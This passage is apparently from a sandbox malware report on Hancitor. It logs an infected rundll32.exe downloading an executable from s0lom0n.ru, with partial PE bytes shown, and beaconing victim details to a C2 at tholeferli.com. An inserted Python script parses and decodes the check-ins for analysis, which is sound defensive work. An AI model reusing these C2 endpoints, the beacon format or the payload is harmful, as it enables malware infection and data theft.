                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4d 4e 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQMNJARRABw==0
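The sessions above are the Hancitor check-in loop: rundll32.exe POSTs a 110-byte form body to tholeferli.com /8/forum.php and gets back a chunked reply whose only payload is a 12-character base64 string. The script below is an added example (not part of the Joe Sandbox report and not the malware's code) that parses one beacon and its reply. The two byte strings are transcribed from session 19's Data Raw lines; the reply decoding applies the publicly documented Hancitor scheme (base64, then every byte XORed with 0x7A), and what the command letter means is not stated anywhere on this page, so the code only extracts the brace-delimited groups.

```python
"""Parse one Hancitor check-in and its C2 reply from the capture above.

Added example; the byte strings are transcribed from the report's
Data Raw lines for session 19 (tholeferli.com, POST /8/forum.php).
"""
import base64
import re
from urllib.parse import parse_qs

HANCITOR_XOR_KEY = 0x7A   # publicly documented reply key, not stated on this page

# 110-byte beacon body as captured.  The report's "Data Ascii" rendering shows
# user-PC\user, but the raw bytes carry the real host\user, so parse the raw form.
BEACON_BODY = bytes.fromhex(
    "47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34"
    " 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d"
    " 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26"
    " 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d"
    " 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29"
)

# The 200 OK body as captured: one 12-byte chunk ("c"), then the last-chunk marker.
REPLY_BODY = bytes.fromhex(
    "63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"
)

# The base64 payload of every reply in this capture (sessions 19, 189-199).
CAPTURED_REPLIES = [
    b"AQJZARRABw==", b"HHSSARRABw==", b"QTGJARRABw==", b"ZVEAARRABw==",
    b"ANMZARRABw==", b"JYBQARRABw==", b"THSGARRABw==", b"QYBJARRABw==",
    b"QHSJARRABw==", b"CBYXARRABw==", b"CBYXARRABw==", b"QMNJARRABw==",
]


def parse_beacon(body: bytes) -> dict:
    """Split the form-encoded check-in into its fields (one value each)."""
    fields = parse_qs(body.decode("ascii"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 body sent with Transfer-Encoding: chunked."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)                           # last-chunk; trailers ignored
        pos = eol + 2
        out += body[pos:pos + size]
        pos += size + 2                                 # skip the chunk's own CRLF


def decode_reply(payload: bytes) -> bytes:
    """Hancitor reply: base64-decode, then XOR every byte with the key."""
    raw = base64.b64decode(payload, validate=True)
    return bytes(b ^ HANCITOR_XOR_KEY for b in raw)


COMMAND_RE = re.compile(rb"\{[a-z]:[^{}]*\}")


def commands(decoded: bytes) -> list:
    """Pull the {letter:argument} groups out of a decoded reply.

    The first three decoded bytes differ from beacon to beacon and are not
    printable; the page does not say what they are, so they are skipped here.
    """
    return [m.decode("latin-1") for m in COMMAND_RE.findall(decoded)]


def triage(beacon: bytes, reply: bytes) -> dict:
    """One beacon/reply pair reduced to what an analyst wants to see."""
    fields = parse_beacon(beacon)
    decoded = decode_reply(dechunk(reply))
    return {
        "bot_id": fields["GUID"],
        "build": fields["BUILD"],
        "victim": fields["INFO"].split(" @ ", 1)[1],
        "external_ip": fields["IP"],
        "os": fields["WIN"],
        "decoded_reply": decoded,
        "commands": commands(decoded),
    }


if __name__ == "__main__":
    for key, value in triage(BEACON_BODY, REPLY_BODY).items():
        print(f"{key:>14}: {value!r}")
    print("all replies:", {c for r in CAPTURED_REPLIES for c in commands(decode_reply(r))})
```

Every reply in the capture ends in the same eight base64 characters (ARRABw==), and because base64 decodes in independent 4-character groups they all decode to a trailing {n:}; only the three leading bytes vary. Two practical points: parse the Data Raw hex rather than the Data Ascii column (the sandbox rewrites the hostname there but not in the hex), and strip the chunked framing before base64-decoding, otherwise the "c" and "0" markers corrupt the payload.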


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.22 | 49169 | 8.211.241.0 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:04.434003115 CEST | 2 | OUT | GET /7hsjfd9w4refsd.exe HTTP/1.1
                                                Accept: */*
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: s0lom0n.ru
                                                Cache-Control: no-cache
                                                Jul 22, 2021 16:11:04.616672993 CEST | 4 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 22 Jul 2021 14:11:04 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 272910
                                                Connection: keep-alive
                                                Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
                                                ETag: "60c0e5a8-42a0e"
                                                Accept-Ranges: bytes
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 
00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 c3 8d b4 26 00 00 00 00 8d bc 27 00 00 00 00 83 ec 1c 31 c0 66 81 3d 00 00 40 00 4d 5a c7 05 ec 43 44 00 01 00 00 00 c7 05 e8 43 44 00 01 00 00 00 c7 05 e4 43 44 00 01 00 00 00 c7 05 80
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*/P&`@ PdR.textDOP`P`.data8`T@@.rdata-p.V@@@/4@0@.bss@@`.idataP@0.CRT8`&@0.tlsp(@0&'1f=@MZCDCDCD
                                                Jul 22, 2021 16:11:04.616720915 CEST | 5 | IN | Data Raw: 40 44 00 01 00 00 00 74 49 a3 08 40 44 00 a1 f8 43 44 00 85 c0 74 2d c7 04 24 02 00 00 00 e8 b2 3d 03 00 e8 b5 3d 03 00 8b 15 08 44 44 00 89 10 e8 ac 3e 03 00 83 3d 20 60 43 00 01 74 63 31 c0 83 c4 1c c3 c7 04 24 01 00 00 00 e8 85 3d 03 00 eb d1
                                                Data Ascii: @DtI@DCDt-$==DD>= `Ctc1$=<@@PE@uQft>fuv1rv'$QC@1ytL1:f,CDD$@DD$@DD$@D
                                                Jul 22, 2021 16:11:04.616750002 CEST | 7 | IN | Data Raw: 10 00 8d 77 14 8b 47 08 3b 47 0c 74 72 8d 48 18 8d 55 d8 89 4f 08 8d 4d ac f2 0f 10 40 10 f2 0f 11 45 e8 f2 0f 10 00 f2 0f 10 48 08 f2 0f 11 4d e0 f2 0f 11 45 d8 e8 8b 2e 00 00 89 d9 e8 e2 1b 00 00 c7 47 10 01 00 00 00 f2 0f 10 45 e8 f2 0f 11 46
                                                Data Ascii: wG;GtrHUOM@EHME.GEFEMNEtMEM]4g],uKuW0&.t8MEMMMEEMECKCO,>g,#H^_[
                                                Jul 22, 2021 16:11:04.616771936 CEST | 8 | IN | Data Raw: d9 89 45 d0 f2 0f 11 45 c8 e8 b4 4e 02 00 89 d6 8d 4d ac 89 c2 56 e8 41 b7 00 00 58 89 d9 e8 dd 0f 02 00 8b 45 c4 f2 0f 10 45 bc f2 0f 10 55 ac f2 0f 10 4d b4 8d 4d 94 89 da 89 45 e0 f2 0f 11 45 d8 f2 0f 11 4d d0 f2 0f 11 55 c8 e8 99 2b 00 00 8b
                                                Data Ascii: EENMVAXEEUMMEEMU+EpUuJJMEMEMUFNVeME `^_[]USWV,rMBJ)EMtFKBAr[rIs
                                                Jul 22, 2021 16:11:04.616791964 CEST | 9 | IN | Data Raw: 1c 8b 5a 04 89 c6 0f b7 78 06 85 db 74 0a 8b 76 34 8b 44 b8 34 4b eb ee 8b 52 08 eb 06 31 c0 31 f6 31 d2 83 21 00 89 71 04 83 61 08 00 83 61 0c 00 83 61 10 00 89 41 14 83 61 18 00 89 79 1c 89 51 20 5e 5f 5b 5d c3 55 89 e5 53 57 56 83 ec 20 8b 45
                                                Data Ascii: Zxtv4D4KR111!qaaaAayQ ^_[]USWV EuMWPf%XYFN>^EMv9jXP7YUjXP7YjX9EuOM0}t2u6jZW|%Y9u WuP-MUc0
                                                Jul 22, 2021 16:11:04.616808891 CEST | 11 | IN | Data Raw: 74 00 00 eb 1a b8 5c 6e 00 00 eb 13 b8 5c 72 00 00 eb 0c b8 5c 22 00 00 eb 05 b8 5c 27 00 00 89 f9 c7 45 d4 01 00 00 00 83 65 d8 00 89 4d dc 89 45 e0 e9 50 ff ff ff 89 c1 80 c1 e0 80 f9 5f 73 05 31 c9 41 eb db 89 c2 c0 ea 04 3c a0 6a 57 59 6a 30
                                                Data Ascii: t\n\r\"\'EeMEP_s1A<jWYj0_B$<jWZBj_\xjY/ECEeECeEKSPtY(^_[]UEMj'Y]UEMjY]UEu0
                                                Jul 22, 2021 16:11:04.616833925 CEST12INData Raw: 00 83 c4 24 5e 5f 5d c3 e8 95 1b 02 00 0f 0b 55 89 e5 57 56 83 ec 24 89 ce 31 c9 8d 45 f4 8d 7d ec 89 10 41 8d 55 d4 89 07 c7 47 04 13 28 40 00 89 0e 83 66 04 00 c7 02 c8 94 43 00 89 4a 04 83 62 08 00 83 66 08 00 89 7a 10 89 4a 14 89 f1 e8 bb fb
                                                Data Ascii: $^_]UWV$1E}AUG(@fCJbfzJu$^_]7UWV$1E}AUG&@fCJbfzJ]u5$^_]UWV$1E}AUG_&@f
                                                Jul 22, 2021 16:11:04.616856098 CEST13INData Raw: 75 1c ff 75 18 ff 75 14 e8 4f 05 01 00 83 c4 10 89 f0 5e 5d c3 55 89 e5 56 8b 75 08 8b 45 0c 8b 55 10 89 f1 ff 30 ff 75 1c ff 75 18 ff 75 14 e8 28 05 01 00 83 c4 10 89 f0 5e 5d c3 55 89 e5 56 8b 75 08 8b 45 0c 8b 55 10 89 f1 ff 30 ff 75 1c ff 75
                                                Data Ascii: uuuO^]UVuEU0uuu(^]UVuEU0uuu^]UVuEU0uuu^]UVuEU0uuu^]UVuEU0uuu^]UVV^]U
                                                Jul 22, 2021 16:11:04.616877079 CEST15INData Raw: 30 37 00 00 58 5d c3 55 89 e5 53 57 56 83 ec 40 85 c9 74 36 8b 45 08 89 ce 0f b7 79 06 85 d2 74 0a 8b 76 34 8b 4c b9 34 4a eb ee 83 65 b4 00 89 75 b8 83 65 bc 00 83 65 c0 00 83 65 c4 00 89 4d c8 83 65 cc 00 89 7d d0 eb 0a 83 65 b8 00 83 65 c8 00
                                                Data Ascii: 07X]USWV@t6Eytv4L4JeueeeMe}ee1MA trHEE]EKCsy9r"UMMUEY&UMEuFtL4Jt41#KCsEEt-MUu}MEU%
                                                Jul 22, 2021 16:11:04.616899014 CEST16INData Raw: 38 89 44 24 3c 89 54 24 40 89 f1 89 fa e8 4b 21 00 00 8b 44 24 1c 85 c0 74 0a 8b 4c 24 18 8b 54 24 20 eb d9 8d 65 f4 5e 5f 5b 5d c3 0f 0b 0f 0b 55 89 e5 8b 01 66 83 20 00 8b 51 04 8b 01 01 d2 89 c1 6a 02 e8 b1 31 00 00 58 5d c3 55 89 e5 8b 41 04
                                                Data Ascii: 8D$<T$@K!D$tL$T$ e^_[]Uf Qj1X]UAtkj1X]UV~t+^]JVX^]UWV9t)IF)j4_(VMQ^_]U9t]]UWV9t)
                                                Jul 22, 2021 16:11:04.671677113 CEST18INData Raw: 36 e8 34 f1 01 00 58 59 0f 0b 55 89 e5 56 8b 31 89 d0 8b 51 04 89 f1 50 6a 00 e8 1b f1 01 00 58 59 0f 0b 55 89 e5 57 56 8b 11 8b 79 08 8b 71 04 8b 02 8b 52 04 89 c1 ff 37 ff 36 e8 fa f0 01 00 58 59 0f 0b 55 89 e5 ff 75 0c ff 75 08 e8 81 ee ff ff
                                                Data Ascii: 64XYUV1QPjXYUWVyqR76XYUuuYZ]UuuYZ4]UVUMut9tv<~^]MnUMUEUMt9tv<~)]MEUEAQ<USWV,


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.22 | 49187 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:12.384293079 CEST | 317 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:12.542473078 CEST | 318 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNTGMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
200 | 192.168.2.22 | 49367 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:12:45.595802069 CEST | 519 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:12:45.752193928 CEST | 520 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:12:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNAZMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
201 | 192.168.2.22 | 49368 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:12:46.029088974 CEST | 521 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:12:46.481442928 CEST | 521 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:12:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNYBMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
202 | 192.168.2.22 | 49369 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:12:46.760914087 CEST | 522 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:12:46.929050922 CEST | 522 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:12:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCAZXARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
203 | 192.168.2.22 | 49370 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:12:47.194482088 CEST | 523 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:12:47.664597988 CEST | 523 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:12:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNAZMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
204 | 192.168.2.22 | 49371 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:12:47.959105015 CEST | 524 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:12:48.116082907 CEST | 524 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:12:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZVEAARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
205 | 192.168.2.22 | 49372 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:12:48.397820950 CEST | 525 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:12:49.555432081 CEST | 525 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:12:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 4a 51 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGJQTARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.22 | 49188 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:12.851239920 CEST | 319 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:14.007266998 CEST | 319 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZVEAARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.22 | 49189 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:15.462692022 CEST | 320 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
